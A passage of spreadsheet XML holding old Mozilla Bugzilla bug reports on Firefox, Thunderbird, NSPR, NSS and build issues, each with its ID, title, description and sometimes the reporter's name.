    <t>CORE_GRAVEYARD-72707</t>
  </si>
  <si>
    <t>alfred chrome out of date--won't run on moz0.8.1</t>
  </si>
  <si>
    <t>From Bugzilla Helper:
User-Agent: Mozilla/5.0 (Windows U Windows NT 5.0 en-US 0.8.1) Gecko/20010320
BuildID:    2001032004
On a clean install with a freshly converted profile from Netscape 4 installing
the alfred chrome (install appears successful) and then applying it does
nothing.  Restarting Mozilla hangs at the splash screen deleting profile fixes
hand condition.
Reproducible: Always
Steps to Reproduce:
1.Download alfred chrome from http://x.themes.org using Quick Install
2.View / Apply theme / alfred
3.Restart Mozilla
Actual Results:  Alfred doesn't apply and profile appears corrupt.
Expected Results:  Alfred should apply and profile should remain intact.
I have the corrupted profile if anyone wants me to attach files from it.</t>
  </si>
  <si>
    <t>akayser</t>
  </si>
  <si>
    <t>CORE-128805</t>
  </si>
  <si>
    <t>keyboard fails when top of iframe not entirely in viewport</t>
  </si>
  <si>
    <t>User-Agent: Mozilla/5.0 (Windows U Windows NT 5.0 en-US rv:0.9.8+)
Gecko/20020303
BuildID:    2002030309
also tested on builds 2002030119 2002022706 2002-03-02-08-WIN_GMAKE
Regarding a file with an iframe with a style declaration of top:-#px
Problem: keyboard scrolling doesn't work. cannot enter text in fields. 
  cannot execute keyboard shortcuts.
Expected: keyboard should work scroll type execute shortcuts in iframe.
Reproducible: always.
should also be in component Keyboard Navigation
bug 63663 and bug 100547 may be relevant.
I'll post an attachment to exemplify.</t>
  </si>
  <si>
    <t>bugzilla.mozilla.org</t>
  </si>
  <si>
    <t>MAILNEWS_CORE-327812</t>
  </si>
  <si>
    <t>No server name validation (checking) for POP3/IMAP/News/LDAP server whereas enabled for SMTP</t>
  </si>
  <si>
    <t>Inside preferences if we insert a POP server name like pop.example.com  (note the space at the end of the string) Thunderbird won't complain.
However if we do the same for SMTP Thunderbird will tell us to insert a valid name for the host.
I think we must unify the behaviour here.</t>
  </si>
  <si>
    <t>CORE-138684</t>
  </si>
  <si>
    <t>Account password entered in Java applet does not get through to the server</t>
  </si>
  <si>
    <t>From Bugzilla Helper:
User-Agent: Mozilla/5.0 (X11 U Linux i686 en-US rv:1.0rc1) Gecko/20020417
BuildID:    2002041711
Below `Agencia' and `Conta' on the left of the web page there's a Java applet
in which you're supposed to enter your password.  No matter what I enter there
after I click on the `entra' button I get back the same web page now with an
error message in red below the applet saying `AtenÃ§Ã£o: senha: conteÃºdo nulo'
(meaning Attention: password: null contents).
The same web page works fine on Netscape 4.79-1 on the same machine and OS.  It
fails similarly with Mozilla 0.9.9 included in Red Hat Linux skipjack-beta2
using Sun JRE 1.4.0 as the Java plug-in and with Mozilla 0.9.9 on MS-Windows 2000.
Reproducible: Always
Steps to Reproduce:
1.browse to that web page
2.enter `1-9' for both `AgÃªncia' and `Conta' (otherwise the check-digit
verification will fail before the password is tested)
3.enter anything at all as the `Senha de auto-atendimento' in the Java applet
4.click on `entra'
Actual Results:  An error message saying the password as blank is displayed:
AtenÃ§Ã£o:  
Senha: ConteÃºdo nulo !
Expected Results:  If an incorrect password with 8 digits or longer is
entered you should get to a web page saying `DADOS NAO CONFEREM'.  If a
non-blank password that is too short is entered you'll remain in the same web
page with a message saying the password must have at least 8 characters:
AtenÃ§Ã£o:  
  Senha: ConteÃºdo deve ter no
     mÃ­nimo 8 caracteres !
If the correct password were entered you'd gain access to the account but
you're not supposed to get that far :-)
I'm notifying the bank that some people may be trying out odd passwords on that
web page for account 1-9 1-9.  Hopefully this won't be a problem :-)
I'm not really sure this is a problem with LiveConnect but I found some similar
bug reports in this category but they appear to affect Mac platoforms only so
I thought I'd report it anyway.</t>
  </si>
  <si>
    <t>MAILNEWS_CORE-447619</t>
  </si>
  <si>
    <t>comm_central: add configure option to l10n repositories (port of bug 445328)</t>
  </si>
  <si>
    <t>bug 445328 adds a configure option for L10n repositories to mozilla-central this should be ported over to comm-central.</t>
  </si>
  <si>
    <t>TOOLKIT-371943</t>
  </si>
  <si>
    <t>Report Web Forgery shouldn't open in new tab</t>
  </si>
  <si>
    <t>Current behaviour in trunk (and 2.0.x) is for the Report Web Forgery... menu action to launch google's report page in a new tab.  This seems unsafe since it leaves the phish site open loaded and (presumably since they are currently reporting it) not marked as a phish site.  This leaves open the possibility that the user or another user of the same computer might come back later and being less vigilant this time mistake the scam site for their actual bank/paypal/ebay login.
The menu item should load in the existing tab.  We probably don't need to destroy history indeed it would likely be annoying to do so but we should at least get the scam site off the screen.
Note: the opposite menu item This site is not a forgery can continue to open in a new tab since in that case it is quite plausible that you want to continue interacting with the site.
Will attach 1-liner patch below</t>
  </si>
  <si>
    <t>CORE-252344</t>
  </si>
  <si>
    <t>FTP does never show looking up host status message</t>
  </si>
  <si>
    <t>when going to an ftp url the status bar does not show any messages about
looking up host and not about connecting to host initially either.</t>
  </si>
  <si>
    <t>FIREFOX-356140</t>
  </si>
  <si>
    <t>Enhanced Bookmark Search not available/working for firefox2</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Windows U Windows NT 5.1 de rv:1.8.1) Gecko/20061003 Firefox/2.0
Build Identifier: Mozilla/5.0 (Windows U Windows NT 5.1 de rv:1.8.1) Gecko/20061003 Firefox/2.0
Enhanced Bookmark Search not available/working for firefox2 should work at release
Reproducible: Always</t>
  </si>
  <si>
    <t>FIREFOX_BUILD_SYSTEM-454449</t>
  </si>
  <si>
    <t>client.mk doesn't gracefully fail if it can't locate autoconf</t>
  </si>
  <si>
    <t>If client.mk fails to locate autoconf 2.13 it doesn't fail gracefull at all. It just sets AUTOCONF= and continues like it found it this results in this failure:
$&gt; make -f client.mk
Adding client.mk options from [comm-central]/.mozconfig:
Generating [comm-central]/mozilla/configure using autoconf
cd [comm-central]/mozilla
make[1]: Entering directory `[comm-central]'
Generating [comm-central]/configure using autoconf
cd [comm-central]
Generating [comm-central]/mozilla/configure using autoconf
cd [comm-central]/mozilla
cd [comm-central]/objdir-tb
[comm-central]/configure
/bin/sh: line 1: [comm-central]/configure: No such file or directory
*** Fix above errors and then restart with               make -f client.mk build
make[1]: *** [configure] Error 1
make[1]: Leaving directory `[comm-central]'
make: *** [[comm-central]/objdir-tb/Makefile] Error 2</t>
  </si>
  <si>
    <t>CORE-325100</t>
  </si>
  <si>
    <t>Move DOM inspector C++ components into gklayout</t>
  </si>
  <si>
    <t>The DOM inspector components used for flashing and internal inspection use various internal APIs and I'd like to be able to version them with gecko instead of having to ship them with DOMI. This also means that DOMI is binary-free which is good.
This is basically the same model we already use for venkman.</t>
  </si>
  <si>
    <t>NSPR-31120</t>
  </si>
  <si>
    <t>ntio.c: _PR_Unblock_IO_Wait sets the wrong thr_bound_cpu.</t>
  </si>
  <si>
    <t>This bug was introduced when we added PR_NT_CancelIo
in NSPR 3.5.
In ntio.c function _PR_Unblock_IO_Wait we have:
    thr-&gt;md.thr_bound_cpu = me-&gt;cpu
where 'thr' is the (local) thread being interrupted
and 'me' is the thread calling PR_Interrupt.  This is
incorrect. The CPU of 'me' is irrelevant here.  'me'
may even be a global thread and have no CPU.
That line should be:
    thr-&gt;md.thr_bound_cpu = cpu
which means 'thr' should be bound to its current CPU.
(The local variable 'cpu' is initialized to 'thr-&gt;cpu'.)</t>
  </si>
  <si>
    <t>THUNDERBIRD-221615</t>
  </si>
  <si>
    <t>View Before Return Receipt (Reciept)</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Windows U Windows NT 5.1 en-US rv:1.5) Gecko/20030925
Build Identifier: Mozilla/5.0 (Windows U Windows NT 5.1 en-US rv:1.5) Gecko/20030925
Spamers quite often use return reciepts to confirm email addresses on their
lists.  Mozilla asks you to confirm sending a return reciept *before* you see
the email.
A good way to keep Mozilla on the Spam Fighting fronteer is to allow users to
see the mail *THEN* send the reciept.  That way if it's spam they don't send it.
Mockups to be attached.  Based on Junkmail.
I don't think it would be very hard to do but would be a giant enhancement on
fighting spam.
Reproducible: Always
Steps to Reproduce:</t>
  </si>
  <si>
    <t>THUNDERBIRD-264544</t>
  </si>
  <si>
    <t>Templates deleted after sending</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Windows U Windows NT 5.0 en-US rv:1.7.3) Gecko/20041014 Firefox/0.10.1
Build Identifier: Mozilla/5.0 (Windows U Windows NT 5.0 en-US rv:1.7.3) Gecko/20041014 Firefox/0.10.1
In the moment Thunderbird deletes a template after it has been send the first
time. So it you want to use a template more than one time you have to recover
it every time you've used it
Reproducible: Always
Steps to Reproduce:
1. Create a template
2. Use the template and send the mail
3. Go to the template folder
Actual Results:  
Thunderbird has deleted the template
Expected Results:  
The template should be in the template folder until it has been deleted manualy</t>
  </si>
  <si>
    <t>BUGZILLA-518293</t>
  </si>
  <si>
    <t>Improve and Simplify the QuickSearch Documentation</t>
  </si>
  <si>
    <t>After bug 518024 the quicksearch docs will need to be changed to incorporate the fact that it now accepts all Bugzilla fields. Also it could use some general modernization and simplification.</t>
  </si>
  <si>
    <t>CORE-200391</t>
  </si>
  <si>
    <t>roaming to a different IP address get new mail (for pop) stops working (silently fails)</t>
  </si>
  <si>
    <t>roaming to a different IP address get new mail (for pop) stops working
(silently fails)
brendan writes:
I see this all the time now running 1.3 on RH8 roaming my thinkpad from work
to home or even from DHCP-based home wireless network to old fixed-IP home
network.  I haven't snooped the wire but could it be that some old POP
connection is being reused?  Any way to avoid the annoying quit/restart cycle
I've been using to fix things?
some initial thoughts:
we don't cache pop connections so I wonder want is going on there.  
we might have a dns cache in netwerk (to save calls to gethostbyname()) but I'm
trying to think how that would cause your problem...
it might be necko silently failing to establish the connection or us dropping
the error (which I know we do for some errors) or both.
in nsMsgProtocol.cpp see nsMsgProtocol::OnStopRequest() where we silently drop
certain errors. 
there's an existing bug about us doing that when you try to do pop over ssl or
nntp over ssl and psm is not installed.
brendan can you get a NSPR log for pop?
http://www.mozilla.org/quality/mailnews/mail-troubleshoot.html#pop
darin might have another module for you to log like sockettransport or something.</t>
  </si>
  <si>
    <t>CORE-247068</t>
  </si>
  <si>
    <t>[FIXr]fieldset border should be drawn in legend's margin</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Windows U Win98 en-US rv:1.7) Gecko/20040614 Firefox/0.9
Build Identifier: Mozilla/5.0 (Windows U Win98 en-US rv:1.7) Gecko/20040614 Firefox/0.9
an assumption was made that legend position was fixed so top left horline only
drawn xx pixels...  My example offsets the legend by margin:200px to
emphasize that the top left hor line of the fieldset should be done on a
calculated basis respecting the offset of the legend element.  Note that
other browsers handle this correctly.  I view this as a cosmetic bug but 
was a programmer assumption -- ass/u/me was an old Benny Hill skit -] -]
Reproducible: Always
Steps to Reproduce:
1. simple fieldset / legend structure
2. use css to margin offset the legend by 100 px or so
3. note the way the fieldset is rendered
Actual Results:  
disconnected fieldset box
Expected Results:  
box border up to but not thru legend element</t>
  </si>
  <si>
    <t>ve3ll</t>
  </si>
  <si>
    <t>SOCORRO-421985</t>
  </si>
  <si>
    <t>when a report fails to be processed give info as to why</t>
  </si>
  <si>
    <t>Sometimes reports fail to process. The URL field above shows one such case. Usually it's because of where the crash happens that Socorro can't process it.
We should show an error at the top of the report page when a report has failed to process correctly so those looking at it know the report is finished processing.</t>
  </si>
  <si>
    <t>WEBSITES_GRAVEYARD-984547</t>
  </si>
  <si>
    <t>mobilepartners.mozilla.org</t>
  </si>
  <si>
    <t>Promote New Sprint 1 Branding Certification Process package to Production Partner site</t>
  </si>
  <si>
    <t>See https://bugzilla.mozilla.org/show_bug.cgi?id=970615#c5 for new version of test suite that is ready to be promoted to the Partner site.  (Timing: March 18-20)</t>
  </si>
  <si>
    <t>kward</t>
  </si>
  <si>
    <t>CORE-304277</t>
  </si>
  <si>
    <t>Add further TLDs to IDN whitelist</t>
  </si>
  <si>
    <t>This is another bug to aggregate and add safe TLDs to the IDN whitelist.
Gerv</t>
  </si>
  <si>
    <t>THUNDERBIRD-214482</t>
  </si>
  <si>
    <t>keyboard shortcuts in Address Book don't work</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Windows U Windows NT 5.0 en-US rv:1.5a) Gecko/20030728 Mozilla Firebird/0.6.1
Build Identifier: Thunderbird 0.1 release
Keyboard shortcuts for various actions like deleting editing properties etc. in
Address Book don't work. The menu items/toolbar buttons for these actions work
like they should.
Reproducible: Always
Steps to Reproduce:
1. Start Thunderbird open the Adress Book.
2. Select a contact and hit Del Ctrl+I Ctrl+P or Ctrl+W.
Actual Results:  
Nothing happens.
Expected Results:  
Call the appropriate function corresponding to the key pressed (like delete the
card show its properties etc.)
The delete shortcut first broke in build 20030530 where overlays for the Address
Book were introduced.</t>
  </si>
  <si>
    <t>SEAMONKEY-219362</t>
  </si>
  <si>
    <t>make chrome target recursive</t>
  </si>
  <si>
    <t>Sometimes I need to rebuild just chrome recursively through the entire tree. A
simple chrome-recurse target makes this pretty simple.</t>
  </si>
  <si>
    <t>MOZILLA.ORG-343315</t>
  </si>
  <si>
    <t>l10n CVS account request: Hebrew (he-IL) - Tomer Cohen</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (X11 U Linux i686 en-US rv:1.8.1a3) Gecko/20060526 BonEcho/2.0a3
Build Identifier: Mozilla/5.0 (X11 U Linux i686 en-US rv:1.8.1a3) Gecko/20060526 BonEcho/2.0a3
I need CVS write access to the Hebrew Firefox l10n directory since Reuven Gonen has lack of time to complete the process toward Firefox 2.0. 
Reproducible: Always</t>
  </si>
  <si>
    <t>tomer.moz.bugs</t>
  </si>
  <si>
    <t>WEBTOOLS_GRAVEYARD-405449</t>
  </si>
  <si>
    <t>Clean up 3.0 test cases</t>
  </si>
  <si>
    <t>Tracking bug for clean up work of the 3.0 test cases.
1)test case clean up
-a) STR and verification correctly match 3.0 functionality
-b) areas that aren't clean will be assigned to the owner of that area (unowned areas will be taken care of marcia or myself)
- Suite structure (FFT BFT smoke test)
-- make sure test cases are in the correct test group(s)
-- ensure each subgroup is slotted logically in the test group
-- ensure each test case is slotted logically in the subgroup
note: this is not to identify and track subgroups which are lacking needed test cases. That should be handled by tony and the feature tracking docs.</t>
  </si>
  <si>
    <t>THUNDERBIRD-442730</t>
  </si>
  <si>
    <t>composition security options for encrypt should only be one menu item (with checkbox) like signing</t>
  </si>
  <si>
    <t>In the composition window under Options &gt; Security
 [v] Do not encrypt this message
 [ ] Encrypt this message
 -------------------------------
 [ ] Digitally sign this message 
As you can see the encryptiion has two entries signing has one which adds the checkmark when chosen. 
S/MIME is confusing enough as it is... I don't see why there would have to be two menu items for one thing (for encryption). It should just be one like signing.</t>
  </si>
  <si>
    <t>CORE-309782</t>
  </si>
  <si>
    <t>SVG group opacity performance should be better</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Windows U Windows NT 5.1 en-US rv:1.8b4) Gecko/20050908 Firefox/1.4
Build Identifier: Mozilla/5.0 (Windows U Windows NT 5.1 en-US rv:1.8b4) Gecko/20050908 Firefox/1.4
When displaying new SVG items via scripting an observable performance
degradation is experienced if objects with the same opacity are defined in
different group elements () as opposed to the same. For example displaying
is much faster than
However both are quite equivalent.
Reproducible: Always
Steps to Reproduce:
1.Script mouse events to display two areas. Both areas contain circles
2.In one area define each circle in its own  specifying a certain opacity
on each 
3.In the other area define all circles in one  specifying the same opacity
on the 
Actual Results:  
The area with one  reacts much faster than the one where each circle is in
its own 
Expected Results:  
Both areas being equivalent should perform similarly.</t>
  </si>
  <si>
    <t>TECH_EVANGELISM_GRAVEYARD-101277</t>
  </si>
  <si>
    <t>officepools.com - Web page won't load</t>
  </si>
  <si>
    <t>From Bugzilla Helper:
User-Agent: Mozilla/5.0 (Macintosh U PPC en-US rv:0.9.4) Gecko/20010913
BuildID:    2001091311
When I go to the listed site and then to Create Pool when I try to go to the
Click here site a blank window appears.
Reproducible: Always
Steps to Reproduce:
1. Go to www.officepools.com
2. Go to Create Pool
3. Click on Click here
Actual Results:  A blank windows appears
Expected Results:  A window appears and the sample pool appears. It works on IE
for windows.</t>
  </si>
  <si>
    <t>erin</t>
  </si>
  <si>
    <t>THUNDERBIRD-501161</t>
  </si>
  <si>
    <t>imap mark as deleted: delete multiple messages snaps to last msg of thread pane</t>
  </si>
  <si>
    <t>In threaded mode select all of the message in a thread by clicking the threading indicator (left of the first message in the thread). 
Hit delete to delete all the messages in the thread. The delete works but: the last message in the thread pane is selected as next message not the next message after the thread - like it use to.
This is very inconvenient for me as I do this frequently and current behavior is never what I want. I suspect it's from bug 474701 but haven't verified it.</t>
  </si>
  <si>
    <t>SEAMONKEY-135690</t>
  </si>
  <si>
    <t>xpfe/bootstrap build problems missing library</t>
  </si>
  <si>
    <t>xpfe/bootstrap/Makefile.in is missing a '-lph' for the Photon build.  The link
will not succeed without it.</t>
  </si>
  <si>
    <t>briane</t>
  </si>
  <si>
    <t>SKYWRITER_GRAVEYARD-478370</t>
  </si>
  <si>
    <t>Support for auto-indenting lines</t>
  </si>
  <si>
    <t>CORE-505724</t>
  </si>
  <si>
    <t>nsWifiMonitor::DoScan seems to leak apple_80211_library or crash in all failure cases</t>
  </si>
  <si>
    <t>57 nsWifiMonitor::DoScan()
59   void *apple_80211_library = dlopen(
60       /System/Library/PrivateFrameworks/Apple80211.framework/Apple80211
61       RTLD_LAZY)
if that failed you crash here:
65 WirelessAttachFunction WirelessAttach_function_ = reinterpret_cast(dlsym(apple_80211_library WirelessAttach)) 66 WirelessScanSplitFunction WirelessScanSplit_function_ = reinterpret_cast(dlsym(apple_80211_library WirelessScanSplit)) 67 WirelessDetachFunction WirelessDetach_function_ = reinterpret_cast(dlsym(apple_80211_library WirelessDetach))
if any of those failed you leak here:
69 if (!WirelessAttach_function_ || !WirelessScanSplit_function_ || !WirelessDetach_function_) 70 return NS_ERROR_NOT_AVAILABLE 71 72 if ((*WirelessAttach_function_)(
138       nsIWifiAccessPoint** result = static_cast (nsMemory::Alloc(sizeof(nsIWifiAccessPoint*) * resultCount))
if that fails you leak here:
139 if (!result) 140 return NS_ERROR_OUT_OF_MEMORY
if everything works no leak:
179   dlclose(apple_80211_library)
180   
181   return NS_OK</t>
  </si>
  <si>
    <t>CORE-414141</t>
  </si>
  <si>
    <t>Help debug bad plural strings to PluralForm.jsm by printing the caller</t>
  </si>
  <si>
    <t>Right now it just prints out that the string is bad with what index and plural form.. but we don't know who is causing the problem.</t>
  </si>
  <si>
    <t>CORE-420642</t>
  </si>
  <si>
    <t>Remove eval hack from XOWs</t>
  </si>
  <si>
    <t>For bug 389878 I added a hack to always wrap the 'eval' function even when we're same origin. Thanks to bug 397855 this hack isn't necessary anymore and we can remove it.</t>
  </si>
  <si>
    <t>MOZILLA_LOCALIZATIONS-471933</t>
  </si>
  <si>
    <t>fr / French</t>
  </si>
  <si>
    <t>French translation of Mozilla Europe Privacy Policy</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (X11 U Linux i686 fr rv:1.9.0.5) Gecko/2008121622 Ubuntu/8.10 (intrepid) Firefox/3.0.5
Build Identifier: 
French translation of Mozilla Europe Privacy Policy
Reproducible: Always
Steps to Reproduce:
1.
2.
3.</t>
  </si>
  <si>
    <t>bugzilla.fr</t>
  </si>
  <si>
    <t>julia</t>
  </si>
  <si>
    <t>CORE-172783</t>
  </si>
  <si>
    <t>crashes printing any email [@ nsPrintingPromptService::OnStateChange]</t>
  </si>
  <si>
    <t>If I try to print any email message Mozilla crashes.  It seemed to be limited
to plaintext but now I crash printing any email.
linux trunk build 2002100208 does not crash.  2002100308 does crash.
linux trunk build 2002100421 still crashes.
bonsai says mailnews printing got shook up pretty good during that window (bug
158110)
debug build give approximately 2.5 billion of these:
************************************************************
* Call to xpconnect wrapped JSObject produced this error:  *
[Exception... 'JavaScript component does not have a method named:
getImageSource' when calling method:
[nsIXULTreeBuilderObserver::getImageSource]  nsresult: 0x80570030
(NS_ERROR_XPC_JSOBJECT_HAS_NO_FUNCTION_NAMED)  location:   data: no]
************************************************************
and then
###!!! ASSERTION: aWidgetView must have a widget: 'nsnull != widget' file
nsViewManager.cpp line 1548
WEBSHELL- = 6
###!!! ASSERTION: You can't dereference a NULL nsCOMPtr with operator-&gt;().:
'mRawPtr != 0' file ../../../../../dist/include/xpcom/nsCOMPtr.h line 650</t>
  </si>
  <si>
    <t>MOZILLA.ORG-304354</t>
  </si>
  <si>
    <t>copy scrollbars.css to native and xul file variants</t>
  </si>
  <si>
    <t>From bug 222654:
&gt; Chase can you please do repository copies (so as not to lose the CVS history) of
&gt; mozilla/toolkit/themes/pinstripe/global/scrollbars.css to
nativescrollbars.css and
&gt; mozilla/toolkit/themes/winstripe/global/scrollbars.css to xulscrollbars.css as
&gt; requested by bz in comment 36?
&gt; Thanks.
Drop it like it's hot.</t>
  </si>
  <si>
    <t>ADDONS.MOZILLA.ORG_GRAVEYARD-265487</t>
  </si>
  <si>
    <t>Add Extension: Opine-It</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Windows U Windows NT 5.1 rv:1.7.3) Gecko/20041001 Firefox/0.10.1
Build Identifier: Mozilla/5.0 (Windows U Windows NT 5.1 rv:1.7.3) Gecko/20041001 Firefox/0.10.1
Opine-It allows users to comment and discuss any webpage or URL on the internet
in a orderly centralized location. This plugin for Internet Explorer allows you
to right-click on a page and select Opine-It! to begin leaving comments for
that URL. Webmasters can also utilize the website Icon to add an Opine-It link
to their webpages giving their users the ability to comment and discuss the
siteâ€™s specific pages.
Reproducible: Always
Steps to Reproduce:
1.
2.
3.
http://www.opine-it.com/downloads/opineit.xpi
http://www.opine-it.com
Opine-It! Version 1.0
For FireFox 1.0 PR and earlier</t>
  </si>
  <si>
    <t>krismoore</t>
  </si>
  <si>
    <t>FIREFOX-354894</t>
  </si>
  <si>
    <t>Session restore doesn't work if process hasn't exited (Downloads window open)</t>
  </si>
  <si>
    <t>Mozilla/5.0 (Windows U Windows NT 5.0 en-US rv:1.8.1) Gecko/20060929 BonEcho/2.0 ID:2006092903
From mirp @ http://forums.mozillazine.org/viewtopic.php?p=2515163#2515163
1. New profile start firefox
2. Tools &gt; Options &gt; Main &gt; Startup set 'When Bon Echo Starts' to 'Show my tabs and windows from last time'
3. Open some tabs.
4. Open downloads window from Tools &gt; Downloads
5. Close the browser window (so only the download window remains open)
6. Whilst the download window is still open relaunch firefox
Expected:
Firefox window starts up with previous session's tabs present
Actual:
Firefox starts up but not with the session-you-just-closed's tabs
I guess this is because when you shut down the last browser window but with the downloads window still active firefox doesn't consider this to be closing firefox down so no session data is saved.
Perhaps instead of firefox saving session date only when the firefox.exe process is closing it should do it when the last browser window is closing?</t>
  </si>
  <si>
    <t>maierman</t>
  </si>
  <si>
    <t>MAILNEWS_CORE-220486</t>
  </si>
  <si>
    <t>when i try to get mail from lycos i'm getting  : Sending of password did  not succeed...</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Windows U Windows NT 5.0 en-US rv:1.6a) Gecko/20030926
Build Identifier: Mozilla/5.0 (Windows U Windows NT 5.0 en-US rv:1.6a) Gecko/20030926
I'm using Mozilla 1.6a (2003092604).
When i'm trying to receive my emails from Lycos.co.uk i'm getting this error:
Sending of password did not succeedMail pop.lycos.co.uk responded : Unknown
command.
This error only apeared in 1.6a.
When i'm switching back to 1.5rc2 i'm getting my emails.
Reproducible: Always
Steps to Reproduce:
1.open an accoutn at mail.lycos.co.uk
2.read lycos instractions how to receive emails from email client
3.get emails and than you'll get the error
Actual Results:  
Sending of password did not succeedMail pop.lycos.co.uk responded : Unknown
command.</t>
  </si>
  <si>
    <t>volvo4k</t>
  </si>
  <si>
    <t>BUGZILLA-274365</t>
  </si>
  <si>
    <t>More easy way to search Bugzilla - generic Product/Component and Resolution/Status for search by users</t>
  </si>
  <si>
    <t>According to Product/Component restructure many duplicate bugs on same problem
but different product could be closed as DUP.
For example many of Thunderbird bugs could be closed as same problem as
mai&amp;news bug because common Product=Core/Component=Mail&amp;News:sub-component was
introduced.
However this has caused other duplicate bugs.
 Many users don't care CORE etc.
 Many users search Product=Thunderbird instead of Product=Core
 if he/she uses Thunderbird.
Bug 274237 is an examle.
&gt; 274237 : If first line of msg is '--' entire message is detected as a sig and
quoting problems are introduced
Many DUPed bugs have similar symptom in summary and this bug could be easily
found as DUP by reporter himself by searching with summary=sig &amp; -- 
if and only if Product=CORE is selected.
A way of generic search is required for non-developer users. 
Next is an example of categorization by bug reporter's point of view instead
developer's view.
 Product-Package-or-Unit:
   Mozilla Browser or Firefox Mail&amp;News or Thunderbird
   Mozilla Composer or Standalone Composer and so on 
 Bug-Status:
   (a) Valid-open(Confirmed Not fixed yet)
   (b) Valid-open-or-DUP ((a) or FIXED-DUP)
   (c) Valid-open-or-DUP-or-fixed ((b) or FIXED-RESOLVED/VERIFIED recently)
   (d) May-valid-or-DUP-or-fixed
       ((c) or UNCONFIRMED or WONTFIX or INVALID recently)
 On search above is expanded to appropriate Product/Component or Relution/Status
 automatically.
Categrization in search is different in each search but predefined
categorization will be useful for initial bug search.
I think it will be a way to reduce duplicate bugs.
(I think (d) in above example is usually required)
It can be pre-defined set of saved search initially and is sufficient for
Browser(Firefox and Mozilla) and Mail(Thundeird and Mozilla) only initially
although HTML/JavaScript/ServerSideScript is better as generic search in future. 
In addition to above pre-defined bug-list heading should be more kind to users.
Since default header is designed for program owner is it not approprite for
initial duplicated bug search(owner name is not needed for user).
My customization example is as follows 
  IDLast Changed DateResolutionStatusCompSummary(full)
Although headers can be easily customized initial setting for non-developer is
preferable because developers have sufficient knowledge on bugzilla but usual
users are usually not and many of bugzilla.mozilla.org users are usual users
bug reporters.
Third some limitation on number of search result is required.
If number of hits is very large it takes very long time in both searching and
listing of results.
This causes frustration of uers. Result listing of 10000 is meaningless for users.
Reporting hit count only is better if number of hits exceeds a limit.
This will also reduce server's workload.</t>
  </si>
  <si>
    <t>m-wada</t>
  </si>
  <si>
    <t>CORE-218765</t>
  </si>
  <si>
    <t>accepting certificate from unknown authority causes firebird to hang</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Windows U Windows NT 5.1 en-US rv:1.5a) Gecko/20030728 Mozilla Firebird/0.6.1
Build Identifier: Mozilla/5.0 (Windows U Windows NT 5.1 en-US rv:1.5a) Gecko/20030908 Mozilla Firebird/0.6.1+
Fails in 9/8 build (I fudged above User Agent string 'cause I'd reverted to 0.6.1.)  It words in 0.6.1.
Reproducible: Always
Steps to Reproduce:
1. go to site with certificate with unknown authority
2. accept certificate
Actual Results:  
browser hangs: throbber throbs endlessly icon goes to hourglass never comes back.
Expected Results:  
displayed the page.</t>
  </si>
  <si>
    <t>mozilla.20.zed2323</t>
  </si>
  <si>
    <t>NSS-129379</t>
  </si>
  <si>
    <t>Token redisplay is still too slow</t>
  </si>
  <si>
    <t>PSM makes a lot of queries to NSS to display each line of a cert. When these
queries are reran on the User cert page it generates lots of find object
requests to the token looking for trust objects and Crls.
The fix is to cache the state of trust objects and Crls on token insertion and
removal. (If the token has no trust or crl's at insertion time that fact is
remembered).
NOTE: we will still take the hit for tokens which have trust and CRL's on card.
Only the former presents any problems.</t>
  </si>
  <si>
    <t>MOZILLA.ORG-494949</t>
  </si>
  <si>
    <t xml:space="preserve">SVN Account Request - Mark Hahnenberg </t>
  </si>
  <si>
    <t>Need access to SVN Repo for a web application project I'm working on (Cesium).
LDAP Account: mhahnenberg@mozilla.com</t>
  </si>
  <si>
    <t>ambient.sounds</t>
  </si>
  <si>
    <t>CORE-202608</t>
  </si>
  <si>
    <t>unblock images from server should override Accept images from orig server only</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Windows U Windows NT 5.1 en-US rv:1.4a) Gecko/20030401
Build Identifier: Mozilla/5.0 (Windows U Windows NT 5.1 en-US rv:1.4a) Gecko/20030401
I have Accept images from the originating server only set.  Many web sites put
images on images.domain.com instead of www.domain.com.  One example is
www.weather.com I tried allowing images.weather.com by right-clicking on an
image and selecting unblock images from this server but it still didn't allow
the image.  I guess this makes sense after thinking about it (after all the
image *still* isn't from the originating server) but it's not intuitive.
Reproducible: Always
Steps to Reproduce:
1. Set Accept images from orig server only
2. View www.weather.com
3. Right-click where an image should be select Unblock images from this server
Actual Results:  
Image still doesn't display
Expected Results:  
Display the image.  Setting Unblock image... should override Accept images
from orig server</t>
  </si>
  <si>
    <t>CALENDAR-351168</t>
  </si>
  <si>
    <t>Build Lightning+WCAP when building nightlies</t>
  </si>
  <si>
    <t>We want to build a version of Lightning with WCAP enabled when we build nightlies.
WCAP is off by default. To prevent us from having two actual Lightning's in circulation claiming to be 0.3 we should create a small WCAP Enabler extension and then package both the stock Lightning with the WCAP Enabler in a multi-extension XPI.
Yet to be determined is distribution. We're not sure if this wants to be hosted from addons.mozilla.org or not.</t>
  </si>
  <si>
    <t>FIREFOX-307462</t>
  </si>
  <si>
    <t>Link to release notes from about: points to 1.0 notes instead of 1.4 notes</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Macintosh U PPC Mac OS X Mach-O en-US rv:1.8b4) Gecko/20050907 Firefox/1.4
Build Identifier: Mozilla/5.0 (Macintosh U PPC Mac OS X Mach-O en-US rv:1.8b4) Gecko/20050907 Firefox/1.4
If you go to about: and click the Firefox 1.4 link it brings you to the
Firefox 1.0 release notes instead of the 1.4 releases notes.  Clicking Release
Notes in the Help menu does go to the correct place however.
Reproducible: Always
Steps to Reproduce:
1. Go to the URL about:
2. Click the big blue link that says Firefox 1.4
Actual Results:  
It opened the Firefox 1.0 release notes
(http://www.mozilla.org/products/firefox/releases/1.0.html).
Expected Results:  
It should have opened the Firefox 1.4 release notes like the Help menu does
(http://www.mozilla.org/products/firefox/releases/1.4.html).
Since about: uses the entity  anything else that uses it (if
anything else does) is affected as well.</t>
  </si>
  <si>
